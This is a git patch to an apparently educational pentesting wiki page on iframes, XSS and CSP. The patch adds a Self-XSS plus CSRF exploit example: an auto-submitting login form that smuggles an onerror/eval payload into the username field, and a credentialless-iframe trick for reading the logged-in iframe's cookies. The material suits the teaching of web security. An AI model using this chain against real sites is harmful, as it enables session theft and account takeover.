From 831661ebb6ced266899423e586316fa3373860b6 Mon Sep 17 00:00:00 2001
From: SirBroccoli <carlospolop@gmail.com>
Date: Mon, 18 Aug 2025 15:50:48 +0200
Subject: [PATCH] Update iframes-in-xss-and-csp.md

---
 .../iframes-in-xss-and-csp.md                 | 28 +++++++++++++++++--
 1 file changed, 25 insertions(+), 3 deletions(-)

diff --git a/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md b/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
index b0795ab99..6f76847f7 100644
--- a/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
+++ b/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
@@ -199,10 +199,32 @@ window.top[1].document.cookie = 'foo=bar';            // write
 alert(window.top[2].document.cookie);                 // read -> foo=bar
 ```
 
-To embed 3rd-party content in pages that already enforce COEP you can now simply use:
+- Exploit example: Self-XSS + CSRF
 
-```html
-<iframe credentialless src="https://example.com/public-widget"></iframe>
+In this attack, the attacker prepares a malicious webpage with 2 iframes:
+
+- An iframe that loads the victim's page with the `credentialless` flag with a CSRF that triggers a XSS (Imagin a Self-XSS in the username of the user):
+  ```html
+  <html>
+  <body>
+    <form action="http://victim.domain/login" method="POST">
+      <input type="hidden" name="username" value="attacker_username<img src=x onerror=eval(window.name)>" />
+      <input type="hidden" name="password" value="Super_s@fe_password" />
+      <input type="submit" value="Submit request" />
+    </form>
+    <script>
+      document.forms[0].submit();
+    </script>
+  </body>
+  </html>
+  ```
+
+- Another iframe that actually has the user logged in (without the `credentialless` flag).
+
+Then, from the XSS it's possible to access the other iframe as they have the same SOP and steal the cookie for example executing:
+
+```javascript
+alert(window.top[1].document.cookie);
 ```
 
 ### fetchLater Attack